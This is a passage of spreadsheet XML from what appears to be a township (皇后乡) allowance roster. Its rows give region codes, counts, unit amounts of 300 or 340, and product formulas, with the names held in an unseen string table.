    <row r="1966" ht="23" customHeight="1" spans="1:11">
      <c r="A1966" s="13" t="s">
        <v>5230</v>
      </c>
      <c r="B1966" s="14" t="str">
        <f>B1965</f>
        <v>皇后乡</v>
      </c>
      <c r="C1966" s="14" t="str">
        <f>C1965</f>
        <v>皇后乡</v>
      </c>
      <c r="D1966" s="13" t="s">
        <v>5231</v>
      </c>
      <c r="E1966" s="13" t="s">
        <v>5232</v>
      </c>
      <c r="F1966" s="14" t="str">
        <f>F1965</f>
        <v>4113210615</v>
      </c>
      <c r="G1966" s="14"/>
      <c r="H1966" s="14"/>
      <c r="I1966" s="14"/>
      <c r="J1966" s="14"/>
      <c r="K1966" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1967" ht="23" customHeight="1" spans="1:11">
      <c r="A1967" s="13" t="s">
        <v>5233</v>
      </c>
      <c r="B1967" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1967" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1967" s="14" t="s">
        <v>5234</v>
      </c>
      <c r="E1967" s="14" t="s">
        <v>4893</v>
      </c>
      <c r="F1967" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1967" s="14">
        <v>2</v>
      </c>
      <c r="H1967" s="14">
        <v>300</v>
      </c>
      <c r="I1967" s="14">
        <f>H1967*G1967</f>
        <v>600</v>
      </c>
      <c r="J1967" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1967" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1968" ht="23" customHeight="1" spans="1:11">
      <c r="A1968" s="13" t="s">
        <v>5235</v>
      </c>
      <c r="B1968" s="14" t="str">
        <f>B1967</f>
        <v>皇后乡</v>
      </c>
      <c r="C1968" s="14" t="str">
        <f>C1967</f>
        <v>皇后乡</v>
      </c>
      <c r="D1968" s="13" t="s">
        <v>5236</v>
      </c>
      <c r="E1968" s="13" t="s">
        <v>5237</v>
      </c>
      <c r="F1968" s="14" t="str">
        <f>F1967</f>
        <v>4113210615</v>
      </c>
      <c r="G1968" s="14"/>
      <c r="H1968" s="14"/>
      <c r="I1968" s="14"/>
      <c r="J1968" s="14"/>
      <c r="K1968" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1969" ht="23" customHeight="1" spans="1:11">
      <c r="A1969" s="13" t="s">
        <v>5238</v>
      </c>
      <c r="B1969" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1969" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1969" s="14" t="s">
        <v>5239</v>
      </c>
      <c r="E1969" s="14" t="s">
        <v>4927</v>
      </c>
      <c r="F1969" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1969" s="14">
        <v>1</v>
      </c>
      <c r="H1969" s="14">
        <v>340</v>
      </c>
      <c r="I1969" s="14">
        <f>H1969*G1969</f>
        <v>340</v>
      </c>
      <c r="J1969" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1969" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1970" ht="23" customHeight="1" spans="1:11">
      <c r="A1970" s="13" t="s">
        <v>5240</v>
      </c>
      <c r="B1970" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1970" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1970" s="14" t="s">
        <v>5241</v>
      </c>
      <c r="E1970" s="14" t="s">
        <v>4911</v>
      </c>
      <c r="F1970" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1970" s="14">
        <v>1</v>
      </c>
      <c r="H1970" s="14">
        <v>340</v>
      </c>
      <c r="I1970" s="14">
        <f>H1970*G1970</f>
        <v>340</v>
      </c>
      <c r="J1970" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1970" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1971" ht="23" customHeight="1" spans="1:11">
      <c r="A1971" s="13" t="s">
        <v>5242</v>
      </c>
      <c r="B1971" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1971" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1971" s="14" t="s">
        <v>5243</v>
      </c>
      <c r="E1971" s="14" t="s">
        <v>5071</v>
      </c>
      <c r="F1971" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1971" s="14">
        <v>1</v>
      </c>
      <c r="H1971" s="14">
        <v>340</v>
      </c>
      <c r="I1971" s="14">
        <f>H1971*G1971</f>
        <v>340</v>
      </c>
      <c r="J1971" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1971" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1972" ht="23" customHeight="1" spans="1:11">
      <c r="A1972" s="13" t="s">
        <v>5244</v>
      </c>
      <c r="B1972" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1972" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1972" s="14" t="s">
        <v>5245</v>
      </c>
      <c r="E1972" s="14" t="s">
        <v>4995</v>
      </c>
      <c r="F1972" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1972" s="14">
        <v>1</v>
      </c>
      <c r="H1972" s="14">
        <v>340</v>
      </c>
      <c r="I1972" s="14">
        <f>H1972*G1972</f>
        <v>340</v>
      </c>
      <c r="J1972" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1972" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1973" ht="23" customHeight="1" spans="1:11">
      <c r="A1973" s="13" t="s">
        <v>5246</v>
      </c>
      <c r="B1973" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1973" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1973" s="14" t="s">
        <v>5247</v>
      </c>
      <c r="E1973" s="14" t="s">
        <v>5248</v>
      </c>
      <c r="F1973" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1973" s="14">
        <v>2</v>
      </c>
      <c r="H1973" s="14">
        <v>300</v>
      </c>
      <c r="I1973" s="14">
        <f>H1973*G1973</f>
        <v>600</v>
      </c>
      <c r="J1973" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1973" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1974" ht="23" customHeight="1" spans="1:11">
      <c r="A1974" s="13" t="s">
        <v>5249</v>
      </c>
      <c r="B1974" s="14" t="str">
        <f>B1973</f>
        <v>皇后乡</v>
      </c>
      <c r="C1974" s="14" t="str">
        <f>C1973</f>
        <v>皇后乡</v>
      </c>
      <c r="D1974" s="13" t="s">
        <v>5250</v>
      </c>
      <c r="E1974" s="13" t="s">
        <v>5251</v>
      </c>
      <c r="F1974" s="14" t="str">
        <f>F1973</f>
        <v>4113210615</v>
      </c>
      <c r="G1974" s="14"/>
      <c r="H1974" s="14"/>
      <c r="I1974" s="14"/>
      <c r="J1974" s="14"/>
      <c r="K1974" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1975" ht="23" customHeight="1" spans="1:11">
      <c r="A1975" s="13" t="s">
        <v>5252</v>
      </c>
      <c r="B1975" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1975" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1975" s="14" t="s">
        <v>5253</v>
      </c>
      <c r="E1975" s="14" t="s">
        <v>5254</v>
      </c>
      <c r="F1975" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1975" s="14">
        <v>1</v>
      </c>
      <c r="H1975" s="14">
        <v>340</v>
      </c>
      <c r="I1975" s="14">
        <f>H1975*G1975</f>
        <v>340</v>
      </c>
      <c r="J1975" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1975" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1976" ht="23" customHeight="1" spans="1:11">
      <c r="A1976" s="13" t="s">
        <v>5255</v>
      </c>
      <c r="B1976" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1976" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1976" s="14" t="s">
        <v>5256</v>
      </c>
      <c r="E1976" s="14" t="s">
        <v>4992</v>
      </c>
      <c r="F1976" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1976" s="14">
        <v>1</v>
      </c>
      <c r="H1976" s="14">
        <v>340</v>
      </c>
      <c r="I1976" s="14">
        <f>H1976*G1976</f>
        <v>340</v>
      </c>
      <c r="J1976" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1976" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1977" ht="23" customHeight="1" spans="1:11">
      <c r="A1977" s="13" t="s">
        <v>5257</v>
      </c>
      <c r="B1977" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1977" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1977" s="14" t="s">
        <v>5258</v>
      </c>
      <c r="E1977" s="14" t="s">
        <v>5087</v>
      </c>
      <c r="F1977" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1977" s="14">
        <v>2</v>
      </c>
      <c r="H1977" s="14">
        <v>300</v>
      </c>
      <c r="I1977" s="14">
        <f>H1977*G1977</f>
        <v>600</v>
      </c>
      <c r="J1977" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1977" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1978" ht="23" customHeight="1" spans="1:11">
      <c r="A1978" s="13" t="s">
        <v>5259</v>
      </c>
      <c r="B1978" s="14" t="str">
        <f>B1977</f>
        <v>皇后乡</v>
      </c>
      <c r="C1978" s="14" t="str">
        <f>C1977</f>
        <v>皇后乡</v>
      </c>
      <c r="D1978" s="13" t="s">
        <v>5260</v>
      </c>
      <c r="E1978" s="13" t="s">
        <v>5071</v>
      </c>
      <c r="F1978" s="14" t="str">
        <f>F1977</f>
        <v>4113210615</v>
      </c>
      <c r="G1978" s="14"/>
      <c r="H1978" s="14"/>
      <c r="I1978" s="14"/>
      <c r="J1978" s="14"/>
      <c r="K1978" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1979" ht="23" customHeight="1" spans="1:11">
      <c r="A1979" s="13" t="s">
        <v>5261</v>
      </c>
      <c r="B1979" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1979" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1979" s="14" t="s">
        <v>5262</v>
      </c>
      <c r="E1979" s="14" t="s">
        <v>4939</v>
      </c>
      <c r="F1979" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1979" s="14">
        <v>2</v>
      </c>
      <c r="H1979" s="14">
        <v>300</v>
      </c>
      <c r="I1979" s="14">
        <f>H1979*G1979</f>
        <v>600</v>
      </c>
      <c r="J1979" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1979" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1980" ht="23" customHeight="1" spans="1:11">
      <c r="A1980" s="13" t="s">
        <v>5263</v>
      </c>
      <c r="B1980" s="14" t="str">
        <f>B1979</f>
        <v>皇后乡</v>
      </c>
      <c r="C1980" s="14" t="str">
        <f>C1979</f>
        <v>皇后乡</v>
      </c>
      <c r="D1980" s="13" t="s">
        <v>5264</v>
      </c>
      <c r="E1980" s="13" t="s">
        <v>5265</v>
      </c>
      <c r="F1980" s="14" t="str">
        <f>F1979</f>
        <v>4113210615</v>
      </c>
      <c r="G1980" s="14"/>
      <c r="H1980" s="14"/>
      <c r="I1980" s="14"/>
      <c r="J1980" s="14"/>
      <c r="K1980" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1981" ht="23" customHeight="1" spans="1:11">
      <c r="A1981" s="13" t="s">
        <v>5266</v>
      </c>
      <c r="B1981" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1981" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1981" s="14" t="s">
        <v>5267</v>
      </c>
      <c r="E1981" s="14" t="s">
        <v>3723</v>
      </c>
      <c r="F1981" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1981" s="14">
        <v>1</v>
      </c>
      <c r="H1981" s="14">
        <v>340</v>
      </c>
      <c r="I1981" s="14">
        <f>H1981*G1981</f>
        <v>340</v>
      </c>
      <c r="J1981" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1981" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1982" ht="23" customHeight="1" spans="1:11">
      <c r="A1982" s="13" t="s">
        <v>5268</v>
      </c>
      <c r="B1982" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1982" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1982" s="14" t="s">
        <v>5269</v>
      </c>
      <c r="E1982" s="14" t="s">
        <v>5154</v>
      </c>
      <c r="F1982" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1982" s="14">
        <v>2</v>
      </c>
      <c r="H1982" s="14">
        <v>300</v>
      </c>
      <c r="I1982" s="14">
        <f>H1982*G1982</f>
        <v>600</v>
      </c>
      <c r="J1982" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1982" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1983" ht="23" customHeight="1" spans="1:11">
      <c r="A1983" s="13" t="s">
        <v>5270</v>
      </c>
      <c r="B1983" s="14" t="str">
        <f>B1982</f>
        <v>皇后乡</v>
      </c>
      <c r="C1983" s="14" t="str">
        <f>C1982</f>
        <v>皇后乡</v>
      </c>
      <c r="D1983" s="13" t="s">
        <v>5271</v>
      </c>
      <c r="E1983" s="13" t="s">
        <v>5272</v>
      </c>
      <c r="F1983" s="14" t="str">
        <f>F1982</f>
        <v>4113210615</v>
      </c>
      <c r="G1983" s="14"/>
      <c r="H1983" s="14"/>
      <c r="I1983" s="14"/>
      <c r="J1983" s="14"/>
      <c r="K1983" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1984" ht="23" customHeight="1" spans="1:11">
      <c r="A1984" s="13" t="s">
        <v>5273</v>
      </c>
      <c r="B1984" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1984" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1984" s="14" t="s">
        <v>5274</v>
      </c>
      <c r="E1984" s="14" t="s">
        <v>5087</v>
      </c>
      <c r="F1984" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1984" s="14">
        <v>1</v>
      </c>
      <c r="H1984" s="14">
        <v>340</v>
      </c>
      <c r="I1984" s="14">
        <f>H1984*G1984</f>
        <v>340</v>
      </c>
      <c r="J1984" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1984" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1985" ht="23" customHeight="1" spans="1:11">
      <c r="A1985" s="13" t="s">
        <v>5275</v>
      </c>
      <c r="B1985" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1985" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1985" s="14" t="s">
        <v>5276</v>
      </c>
      <c r="E1985" s="14" t="s">
        <v>4908</v>
      </c>
      <c r="F1985" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1985" s="14">
        <v>1</v>
      </c>
      <c r="H1985" s="14">
        <v>340</v>
      </c>
      <c r="I1985" s="14">
        <f>H1985*G1985</f>
        <v>340</v>
      </c>
      <c r="J1985" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1985" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1986" ht="23" customHeight="1" spans="1:11">
      <c r="A1986" s="13" t="s">
        <v>5277</v>
      </c>
      <c r="B1986" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1986" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1986" s="14" t="s">
        <v>5278</v>
      </c>
      <c r="E1986" s="14" t="s">
        <v>5279</v>
      </c>
      <c r="F1986" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1986" s="14">
        <v>1</v>
      </c>
      <c r="H1986" s="14">
        <v>340</v>
      </c>
      <c r="I1986" s="14">
        <f>H1986*G1986</f>
        <v>340</v>
      </c>
      <c r="J1986" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1986" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1987" ht="23" customHeight="1" spans="1:11">
      <c r="A1987" s="13" t="s">
        <v>5280</v>
      </c>
      <c r="B1987" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1987" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1987" s="14" t="s">
        <v>5281</v>
      </c>
      <c r="E1987" s="14" t="s">
        <v>5282</v>
      </c>
      <c r="F1987" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1987" s="14">
        <v>1</v>
      </c>
      <c r="H1987" s="14">
        <v>340</v>
      </c>
      <c r="I1987" s="14">
        <f>H1987*G1987</f>
        <v>340</v>
      </c>
      <c r="J1987" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1987" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1988" ht="23" customHeight="1" spans="1:11">
      <c r="A1988" s="13" t="s">
        <v>5283</v>
      </c>
      <c r="B1988" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1988" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1988" s="14" t="s">
        <v>5284</v>
      </c>
      <c r="E1988" s="14" t="s">
        <v>4984</v>
      </c>
      <c r="F1988" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1988" s="14">
        <v>2</v>
      </c>
      <c r="H1988" s="14">
        <v>300</v>
      </c>
      <c r="I1988" s="14">
        <f>H1988*G1988</f>
        <v>600</v>
      </c>
      <c r="J1988" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1988" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1989" ht="23" customHeight="1" spans="1:11">
      <c r="A1989" s="13" t="s">
        <v>5285</v>
      </c>
      <c r="B1989" s="14" t="str">
        <f>B1988</f>
        <v>皇后乡</v>
      </c>
      <c r="C1989" s="14" t="str">
        <f>C1988</f>
        <v>皇后乡</v>
      </c>
      <c r="D1989" s="18" t="s">
        <v>5286</v>
      </c>
      <c r="E1989" s="19" t="s">
        <v>4967</v>
      </c>
      <c r="F1989" s="14" t="str">
        <f>F1988</f>
        <v>4113210615</v>
      </c>
      <c r="G1989" s="14"/>
      <c r="H1989" s="14"/>
      <c r="I1989" s="14"/>
      <c r="J1989" s="14"/>
      <c r="K1989" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1990" ht="23" customHeight="1" spans="1:11">
      <c r="A1990" s="13" t="s">
        <v>5287</v>
      </c>
      <c r="B1990" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1990" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1990" s="14" t="s">
        <v>5288</v>
      </c>
      <c r="E1990" s="14" t="s">
        <v>5076</v>
      </c>
      <c r="F1990" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1990" s="14">
        <v>1</v>
      </c>
      <c r="H1990" s="14">
        <v>340</v>
      </c>
      <c r="I1990" s="14">
        <f>H1990*G1990</f>
        <v>340</v>
      </c>
      <c r="J1990" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1990" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1991" ht="23" customHeight="1" spans="1:11">
      <c r="A1991" s="13" t="s">
        <v>5289</v>
      </c>
      <c r="B1991" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1991" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1991" s="14" t="s">
        <v>5290</v>
      </c>
      <c r="E1991" s="14" t="s">
        <v>4933</v>
      </c>
      <c r="F1991" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1991" s="14">
        <v>1</v>
      </c>
      <c r="H1991" s="14">
        <v>340</v>
      </c>
      <c r="I1991" s="14">
        <f>H1991*G1991</f>
        <v>340</v>
      </c>
      <c r="J1991" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1991" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1992" ht="23" customHeight="1" spans="1:11">
      <c r="A1992" s="13" t="s">
        <v>5291</v>
      </c>
      <c r="B1992" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1992" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1992" s="14" t="s">
        <v>5292</v>
      </c>
      <c r="E1992" s="14" t="s">
        <v>5187</v>
      </c>
      <c r="F1992" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1992" s="14">
        <v>2</v>
      </c>
      <c r="H1992" s="14">
        <v>300</v>
      </c>
      <c r="I1992" s="14">
        <f>H1992*G1992</f>
        <v>600</v>
      </c>
      <c r="J1992" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1992" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1993" ht="23" customHeight="1" spans="1:11">
      <c r="A1993" s="13" t="s">
        <v>5293</v>
      </c>
      <c r="B1993" s="14" t="str">
        <f>B1992</f>
        <v>皇后乡</v>
      </c>
      <c r="C1993" s="14" t="str">
        <f>C1992</f>
        <v>皇后乡</v>
      </c>
      <c r="D1993" s="13" t="s">
        <v>5294</v>
      </c>
      <c r="E1993" s="20" t="s">
        <v>5295</v>
      </c>
      <c r="F1993" s="14" t="str">
        <f>F1992</f>
        <v>4113210615</v>
      </c>
      <c r="G1993" s="14"/>
      <c r="H1993" s="14"/>
      <c r="I1993" s="14"/>
      <c r="J1993" s="14"/>
      <c r="K1993" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1994" ht="23" customHeight="1" spans="1:11">
      <c r="A1994" s="13" t="s">
        <v>5296</v>
      </c>
      <c r="B1994" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1994" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1994" s="14" t="s">
        <v>5297</v>
      </c>
      <c r="E1994" s="14" t="s">
        <v>5119</v>
      </c>
      <c r="F1994" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1994" s="14">
        <v>2</v>
      </c>
      <c r="H1994" s="14">
        <v>300</v>
      </c>
      <c r="I1994" s="14">
        <f>H1994*G1994</f>
        <v>600</v>
      </c>
      <c r="J1994" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1994" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1995" ht="23" customHeight="1" spans="1:11">
      <c r="A1995" s="13" t="s">
        <v>5298</v>
      </c>
      <c r="B1995" s="14" t="str">
        <f>B1994</f>
        <v>皇后乡</v>
      </c>
      <c r="C1995" s="14" t="str">
        <f>C1994</f>
        <v>皇后乡</v>
      </c>
      <c r="D1995" s="13" t="s">
        <v>5299</v>
      </c>
      <c r="E1995" s="13" t="s">
        <v>5300</v>
      </c>
      <c r="F1995" s="14" t="str">
        <f>F1994</f>
        <v>4113210615</v>
      </c>
      <c r="G1995" s="14"/>
      <c r="H1995" s="14"/>
      <c r="I1995" s="14"/>
      <c r="J1995" s="14"/>
      <c r="K1995" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1996" ht="23" customHeight="1" spans="1:11">
      <c r="A1996" s="13" t="s">
        <v>5301</v>
      </c>
      <c r="B1996" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1996" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1996" s="14" t="s">
        <v>5302</v>
      </c>
      <c r="E1996" s="14" t="s">
        <v>5279</v>
      </c>
      <c r="F1996" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1996" s="14">
        <v>3</v>
      </c>
      <c r="H1996" s="14">
        <v>305</v>
      </c>
      <c r="I1996" s="14">
        <f>H1996*G1996</f>
        <v>915</v>
      </c>
      <c r="J1996" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1996" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1997" ht="23" customHeight="1" spans="1:11">
      <c r="A1997" s="13" t="s">
        <v>5303</v>
      </c>
      <c r="B1997" s="14" t="str">
        <f>B1996</f>
        <v>皇后乡</v>
      </c>
      <c r="C1997" s="14" t="str">
        <f>C1996</f>
        <v>皇后乡</v>
      </c>
      <c r="D1997" s="13" t="s">
        <v>5304</v>
      </c>
      <c r="E1997" s="20" t="s">
        <v>5305</v>
      </c>
      <c r="F1997" s="14" t="str">
        <f>F1996</f>
        <v>4113210615</v>
      </c>
      <c r="G1997" s="14"/>
      <c r="H1997" s="14"/>
      <c r="I1997" s="14"/>
      <c r="J1997" s="14"/>
      <c r="K1997" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1998" ht="23" customHeight="1" spans="1:11">
      <c r="A1998" s="13" t="s">
        <v>5306</v>
      </c>
      <c r="B1998" s="14" t="str">
        <f>B1997</f>
        <v>皇后乡</v>
      </c>
      <c r="C1998" s="14" t="str">
        <f>C1997</f>
        <v>皇后乡</v>
      </c>
      <c r="D1998" s="15" t="s">
        <v>5307</v>
      </c>
      <c r="E1998" s="15" t="s">
        <v>5308</v>
      </c>
      <c r="F1998" s="14" t="str">
        <f>F1997</f>
        <v>4113210615</v>
      </c>
      <c r="G1998" s="14"/>
      <c r="H1998" s="14"/>
      <c r="I1998" s="14"/>
      <c r="J1998" s="14"/>
      <c r="K1998" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1999" ht="23" customHeight="1" spans="1:11">
      <c r="A1999" s="13" t="s">
        <v>5309</v>
      </c>
      <c r="B1999" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1999" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1999" s="14" t="s">
        <v>5310</v>
      </c>
      <c r="E1999" s="14" t="s">
        <v>5311</v>
      </c>
      <c r="F1999" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1999" s="14">
        <v>1</v>
      </c>
      <c r="H1999" s="14">
        <v>340</v>
      </c>
      <c r="I1999" s="14">
        <f>H1999*G1999</f>
        <v>340</v>
      </c>
      <c r="J1999" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1999" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2000" ht="23" customHeight="1" spans="1:11">
      <c r="A2000" s="13" t="s">
        <v>5312</v>
      </c>
      <c r="B2000" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2000" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2000" s="14" t="s">
        <v>5313</v>
      </c>
      <c r="E2000" s="14" t="s">
        <v>5314</v>
      </c>
      <c r="F2000" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2000" s="14">
        <v>3</v>
      </c>
      <c r="H2000" s="14">
        <v>265</v>
      </c>
      <c r="I2000" s="14">
        <f>H2000*G2000</f>
        <v>795</v>
      </c>
      <c r="J2000" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2000" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2001" ht="23" customHeight="1" spans="1:11">
      <c r="A2001" s="13" t="s">
        <v>5315</v>
      </c>
      <c r="B2001" s="14" t="str">
        <f>B2000</f>
        <v>皇后乡</v>
      </c>
      <c r="C2001" s="14" t="str">
        <f>C2000</f>
        <v>皇后乡</v>
      </c>
      <c r="D2001" s="13" t="s">
        <v>5316</v>
      </c>
      <c r="E2001" s="13" t="s">
        <v>5317</v>
      </c>
      <c r="F2001" s="14" t="str">
        <f>F2000</f>
        <v>4113210615</v>
      </c>
      <c r="G2001" s="14"/>
      <c r="H2001" s="14"/>
      <c r="I2001" s="14"/>
      <c r="J2001" s="14"/>
      <c r="K2001" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2002" ht="23" customHeight="1" spans="1:11">
      <c r="A2002" s="13" t="s">
        <v>5318</v>
      </c>
      <c r="B2002" s="14" t="str">
        <f>B2001</f>
        <v>皇后乡</v>
      </c>
      <c r="C2002" s="14" t="str">
        <f>C2001</f>
        <v>皇后乡</v>
      </c>
      <c r="D2002" s="13" t="s">
        <v>5319</v>
      </c>
      <c r="E2002" s="13" t="s">
        <v>2098</v>
      </c>
      <c r="F2002" s="14" t="str">
        <f>F2001</f>
        <v>4113210615</v>
      </c>
      <c r="G2002" s="14"/>
      <c r="H2002" s="14"/>
      <c r="I2002" s="14"/>
      <c r="J2002" s="14"/>
      <c r="K2002" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2003" ht="23" customHeight="1" spans="1:11">
      <c r="A2003" s="13" t="s">
        <v>5320</v>
      </c>
      <c r="B2003" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2003" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2003" s="14" t="s">
        <v>5321</v>
      </c>
      <c r="E2003" s="14" t="s">
        <v>4914</v>
      </c>
      <c r="F2003" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2003" s="14">
        <v>1</v>
      </c>
      <c r="H2003" s="14">
        <v>340</v>
      </c>
      <c r="I2003" s="14">
        <f>H2003*G2003</f>
        <v>340</v>
      </c>
      <c r="J2003" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K2003" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2004" ht="23" customHeight="1" spans="1:11">
      <c r="A2004" s="13" t="s">
        <v>5322</v>
      </c>
      <c r="B2004" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C2004" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D2004" s="14" t="s">
        <v>5323</v>
      </c>
      <c r="E2004" s="14" t="s">
        <v>4922</v>
      </c>
      <c r="F2004" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G2004" s="14">
        <v>1</v>
      </c>
      <c r="H2004" s="14">
        <v>340</v>
      </c>
      <c r="I2004" s="14">
        <f>H2004*G2004</f>
        <v>340</v>
      </c>
      <c r="J2004" s="14" t="s">
        <v>224</v>
      </c>
